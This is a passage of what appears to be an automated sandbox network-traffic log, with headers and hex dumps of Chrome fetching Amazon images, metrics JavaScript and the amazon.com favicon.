                                                                                                                                  Via: 1.1 7bf0fe9eca07efaffe6363062053f386.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 11244254
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: QOoJMd84oGD4NX0QbY2Y3bleTFvRrhFAS8EzyBVy55pVlQpoE_L-aA==
                                                                                                                                  2025-01-27 14:45:16 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 02 58 08 03 00 00 00 7b 32 40 ba 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 03 00 50 4c 54 45 ff ff ff e1 e3 e6 d6 d8 db fc 9b 18 f7 98 1b 99 99 99 45 a2 c6 c3 5d 04 55 55 55 30 39 42 33 33 33 23 2a 31 00 00 00 e1 e3 e6 ce d0 d3 df aa 00 fc 9b 18 99 99 99 c6 95 00 45 a2 c6 c6 88 00 46 4c 53 39 41 4a 00 00 00 e1 e3 e6 d6 d8 db fc 9b 18 f7 98 1b 99 99 99 c6 95 00 45 a2 c6 c6 88 00 e4 79 11 66 66 66 55 55 55 4b 52 5b 46 4c 53 39 41 4a 00 00 00 e1 e3 e6 df aa 00 fc 9b 18 99 99 99 45 a2 c6 66 66 66 4b 52 5b 33 33 33 00 00 00 d1 d3 d6 ea bf 00 99 99 99 45 a2 c6 69 6e 75 00 00 00 e1 e3 e6 d1 d3 d6 ce d0 d3 ff c4 00 f7 ae 00 df aa 00 f1 a4 00 df 97 00 99 99 99 45 a2 c6 64 6b 73 53 5b 63 46
                                                                                                                                  Data Ascii: PNGIHDRX{2@sBITOPLTEE]UUU09B333#*1EFLS9AJEyfffUUUKR[FLS9AJEfffKR[333EinuEdksS[cF
                                                                                                                                  2025-01-27 14:45:16 UTC588INData Raw: 6b 0e 29 f6 3b 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 9a 3e fa b4 b1 49 51 8b 99 ae 67 a6 85 18 5e c7 bc 57 e6 19 99 14 b5 98 e9 fa 5e 47 0c 63 bf df fc ca a7 8d 4c 8a 5a cc 74 7d af 23 86 b1 df 1f 78 e5 01 23 93 a2 16 33 5d df eb 88 5d ec f7 79 30 06 76 9e 71 49 51 8b 99 ae f3 75 c4 2e f6 fb 9d af be fa ea 0a e3 92 a2 16 33 5d e7 eb 88 5d ec f7 9f c0 a0 e4 9f 18 97 14 b5 d8 ef 3a 5f 47 0c 62 bf c3 10 64 3e fe f5 d5 d7 c4 71 b0 b7 e8 99 14 b5 98 e9 ba 5e 87 98 f2 da ab b1 88 fd fe b7 3f 7d 1d bf ff 55 14 e4 e6 e7 7f ab 6f 52 d4 62 a6 eb 7a 1d 3f 17 93 62 12 fb 7d fe 0f fe e0 d5 0f e6 eb 9d 14 b5 98 e9 46 5c 47 8c 62 bf df 25 67 e7 2e 23 92 a2 16 80 58 ff eb 88 51 20 e5 bf 94 f3 f3 97 46 24 45 2d 66 ba fe d7 11 a3 d8 ef b7 bc 21 e9 16 23 92 a2 16
                                                                                                                                  Data Ascii: k);D"H$D"H$D>IQg^W^GcLZt}#x#3]]y0vqIQu.3]]:_Gbd>q^?}UoRbz?b}F\Gb%g.#XQ F$E-f!#


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  30192.168.2.54984318.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:16 UTC442OUTGET /images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1._V313498596_.js HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:17 UTC1072INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/x-javascript
                                                                                                                                  Content-Length: 7210
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 54852007-44b6-4c89-a8fb-dfdc707ada3a
                                                                                                                                  Date: Sat, 25 May 2024 04:11:45 GMT
                                                                                                                                  Cache-Control: max-age=630720000,public
                                                                                                                                  Last-Modified: Wed, 26 Aug 2015 14:52:49 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-762,/images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1
                                                                                                                                  Expires: Fri, 20 May 2044 04:11:45 GMT
                                                                                                                                  Surrogate-Key: x-cache-762 /images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 24fc4e03b1de2a14f79be2422e46a318.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 11323812
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: qtKdyYjvj85xGI0e3Mqnx00U1Z3TQNj6-cBTqsr-ODGEBG6zZ8s36A==
                                                                                                                                  2025-01-27 14:45:17 UTC7210INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 63 2e 75 65 3d 63 2e 75 65 7c 7c 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 62 28 68 2c 6a 2c 69 29 7b 76 61 72 20 67 3d 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 65 77 20 44 61 74 65 28 2b 6e 65 77 20 44 61 74 65 2b 69 29 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 3b 64 2e 63 6f 6f 6b 69 65 3d 68 2b 22 3d 22 2b 6a 2b 67 2b 22 3b 20 70 61 74 68 3d 2f 22 7d 66 75 6e 63 74 69 6f 6e 20 61 28 67 29 7b 69 66 28 64 2e 63 6f 6f 6b 69 65 26 26 64 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 29 7b 76 61 72 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 6a 2c 6d 2c 6b 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 73 2a 22 2b 67 2b 22 3d 22 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 6c
                                                                                                                                  Data Ascii: (function(c,d){c.ue=c.ue||{};function b(h,j,i){var g="; expires="+new Date(+new Date+i).toGMTString();d.cookie=h+"="+j+g+"; path=/"}function a(g){if(d.cookie&&d.cookie.split){var l=document.cookie.split(";"),j,m,k=new RegExp("^\\s*"+g+"=");for(var h=0;h<l


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  31192.168.2.549844108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:16 UTC684OUTGET /images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-session-snapshot-keypress.min._V2_.js HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:17 UTC1169INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: application/x-javascript
                                                                                                                                  Content-Length: 19614
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 227e3a7a-d22d-49e4-812f-ba82f1ad2878
                                                                                                                                  Date: Tue, 13 Aug 2024 03:29:55 GMT
                                                                                                                                  Cache-Control: max-age=630720000,public
                                                                                                                                  Last-Modified: Thu, 01 Oct 2015 10:17:43 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  Edge-Cache-Tag: x-cache-333,/images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-s
                                                                                                                                  Expires: Mon, 08 Aug 2044 03:29:55 GMT
                                                                                                                                  Surrogate-Key: x-cache-333 /images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-s
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 86b463b2b2449ea5ba66d271a3c29922.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 13288094
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: XBRx8DYZ-k5JFAVCD67vIEDY-F6WvEvpJ-S0nijyN5hNRERqShVh5A==
                                                                                                                                  2025-01-27 14:45:17 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 70 29 7b 66 75 6e 63 74 69 6f 6e 20 6c 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 7b 7d 2c 66 2c 63 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 3d 61 5b 64 5d 2c 66 3d 63 2e 72 2b 63 2e 73 2b 63 2e 6d 2c 63 2e 63 26 26 28 62 5b 66 5d 7c 7c 28 62 5b 66 5d 3d 5b 5d 29 2c 62 5b 66 5d 2e 70 75 73 68 28 61 5b 64 5d 29 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 31 3b 62 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 66 3d 61 72 67 75 6d 65 6e 74 73 5b 62 5d 3b 74 72 79 7b 69 66 28 66 2e 69 73 53 75 70 70 6f 72 74 65 64 29 72 65 74 75 72 6e 20 66 2e 73 65 6e 64 28 61 29 7d 63 61 74 63 68 28 63 29 7b 7d 7d 7d
                                                                                                                                  Data Ascii: (function(a,c,p){function l(a){for(var b={},f,c,d=0;d<a.length;d++)c=a[d],f=c.r+c.s+c.m,c.c&&(b[f]||(b[f]=[]),b[f].push(a[d]));return b}function k(a){for(var b=1;b<arguments.length;b++){var f=arguments[b];try{if(f.isSupported)return f.send(a)}catch(c){}}}
                                                                                                                                  2025-01-27 14:45:17 UTC3230INData Raw: 7d 7d 7d 28 29 2c 61 2e 75 65 5f 63 65 6c 26 26 61 2e 75 65 5f 63 65 6c 2e 72 65 67 69 73 74 65 72 4d 6f 64 75 6c 65 28 22 6d 6f 75 73 65 20 6d 6f 76 65 20 6d 6f 64 75 6c 65 22 2c 61 2e 75 65 5f 6d 6d 6d 29 29 7d 29 28 75 65 5f 63 73 6d 2c 0a 64 6f 63 75 6d 65 6e 74 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 70 2c 6c 29 7b 21 61 2e 75 65 2e 69 73 42 46 26 26 21 70 2e 75 65 5f 72 70 6c 26 26 61 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 26 26 6c 26 26 28 70 2e 75 65 5f 72 70 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 2c 62 2c 63 29 7b 78 2e 75 6e 73 68 69 66 74 28 7b 65 6c 65 6d 3a 61 2c 74 79 70 65 3a 62 2c
                                                                                                                                  Data Ascii: }}}(),a.ue_cel&&a.ue_cel.registerModule("mouse move module",a.ue_mmm))})(ue_csm,document);(function(a,c,p,l){!a.ue.isBF&&!p.ue_rpl&&a.MutationObserver&&a.performance&&a.performance.now&&l&&(p.ue_rpl=function(){function k(a,b,c){x.unshift({elem:a,type:b,


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  32192.168.2.54979799.86.8.424433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:17 UTC621OUTGET /favicon.ico HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: csm-sid=837-4096594-8717172
                                                                                                                                  2025-01-27 14:45:17 UTC680INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                  Content-Length: 17542
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  Date: Mon, 27 Jan 2025 14:43:31 GMT
                                                                                                                                  x-amz-rid: DJRHRKZFW1G4NF4BFSS9
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Last-Modified: Tue, 21 Sep 2010 17:37:41 GMT
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  ETag: "4486-490c87c5a6340"
                                                                                                                                  Vary: Accept-Encoding,Accept-Encoding
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  Via: 1.1 df86e917220bc08caa68b0eb8ddabe90.cloudfront.net (CloudFront)
                                                                                                                                  X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  X-Amz-Cf-Id: Ei-3ipTssfpXW8JcxpyuAnKMvsKIk2Zkj3_ziR9yotPyX-yqqzVYGA==
                                                                                                                                  Age: 106
                                                                                                                                  2025-01-27 14:45:17 UTC15704INData Raw: 00 00 01 00 04 00 30 30 00 00 01 00 20 00 a8 25 00 00 46 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 ee 25 00 00 18 18 00 00 01 00 20 00 88 09 00 00 96 36 00 00 10 10 00 00 01 00 20 00 68 04 00 00 1e 40 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 80 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 45 ff ff ff 99 ff ff ff cc ff ff ff f3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: 00 %F % 6 h@(0` %E
                                                                                                                                  2025-01-27 14:45:17 UTC1838INData Raw: 04 ff 05 05 04 ff cc cc cc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f0 ff ff ff f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 66 66 65 ff 05 05 04 ff 05 05 04 ff 1d 1d 1c ff be be be ff cc cc cc ff 45 45 44 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff f2 f2 f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f0 ff ff ff f0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cc cc cc ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 56 56 54 ff f6 f6 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ed ff ff ff d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: ffeEEDVVT


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  33192.168.2.549852162.219.225.1184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:17 UTC386OUTGET /favicon.ico HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: csm-sid=837-4096594-8717172
                                                                                                                                  2025-01-27 14:45:18 UTC672INHTTP/1.1 200
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 17542
                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                  server: Server
                                                                                                                                  content-type: image/x-icon
                                                                                                                                  x-amzn-cdn-id: fy-37f8135bdc43405e9594000000000001
                                                                                                                                  vary: User-Agent,Content-Type,Accept-Encoding,User-Agent
                                                                                                                                  strict-transport-security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                                  x-amz-rid: 8HD499TQT1JC2X8CD4SN
                                                                                                                                  accept-ranges: bytes
                                                                                                                                  etag: "4486-490c87c5a6340"
                                                                                                                                  last-modified: Tue, 21 Sep 2010 17:37:41 GMT
                                                                                                                                  date: Mon, 27 Jan 2025 14:43:40 GMT
                                                                                                                                  age: 99
                                                                                                                                  x-cache: HIT
                                                                                                                                  x-cache-hits: 111857
                                                                                                                                  x-served-by: cache-nyc-kteb1890081-NYC
                                                                                                                                  alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: 00 00 01 00 04 00 30 30 00 00 01 00 20 00 a8 25 00 00 46 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 ee 25 00 00 18 18 00 00 01 00 20 00 88 09 00 00 96 36 00 00 10 10 00 00 01 00 20 00 68 04 00 00 1e 40 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 80 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 45 ff ff ff 99 ff ff ff cc ff ff ff f3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: 00 %F % 6 h@(0` %E
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: 00 a8 ff ff 00 a7 fe ff 00 a8 ff ff 00 a7 ff ff 00 a7 ff ff 00 a8 ff ff 00 a7 ff ff 50 be ff ff e6 f5 ff ff ff ff ff ff ff ff ff ff 51 bf ff ff 90 d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 96 ff ff ff ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f2 fa ff ff 72 ca ff ff 00 a8 ff ff 00 a7 ff ff 00 a7 ff ff 00 a8 ff ff 00 a8 ff ff 50 bf ff ff 91 d5 ff ff cb ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d8 ef ff ff ad df ff ff 72 c9 ff ff 13 ad ff ff 00 a7 fe ff 00 a7 ff ff 00 a8 ff ff 13 ad ff ff bc e5 ff ff ff ff ff ff 9f da ff ff 00 a8 ff ff e5 f4 ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: PQrPr
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: ff ff ff ff ff ff ca e9 ff ff ca e9 ff ff ca ea ff ff e5 f4 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a2 a2 a2 ff 1d 1d 1c ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 05 05 04 ff 05 05 04 ff 56 56 54 ff e6 e6 e6 ff ff ff ff ff ff ff ff ff ff ff ff ff b0 b0 af ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 76 76 76 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: VVTvvv
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 56 56 55 ff 05 05 04 ff 04 04 03 ff 05 05 03 ff 05 05 03 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 45 45 44 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b0 b0 af ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff e5 e5 e5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 66 66 65 ff 05 05 03 ff 05 05 04 ff 05 05 03
                                                                                                                                  Data Ascii: VVUEEDffe
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff be be be ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 56 56 54 ff 44 44 43 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 55 55 54 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cc cc cc ff 1d 1d 1b ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 05
                                                                                                                                  Data Ascii: VVTDDCUUT
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: 05 05 04 ff 05 05 04 ff 05 05 04 ff 67 67 66 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 94 94 93 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 76 76 76 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 56 56 54 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 05 05 03 ff 1d 1d 1c ff f3 f3 f3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 76 76 76 ff 05 05 03 ff 05 05 04 ff 05 05 04 ff 05 05 04
                                                                                                                                  Data Ascii: ggfvvvVVTvvv
                                                                                                                                  2025-01-27 14:45:18 UTC1378INData Raw: 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 55 55 54 ff f2 f2 f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 42 ff ff ff 03 ff ff ff cf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 95 95 94 ff 31 31 30 ff 05 05 04 ff 05 05 03 ff 05 05 03 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 04 ff 05 05 03 ff 05 05 04 ff 05 05 03 ff 31 31 30 ff b1 b1 b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: UUTB110110
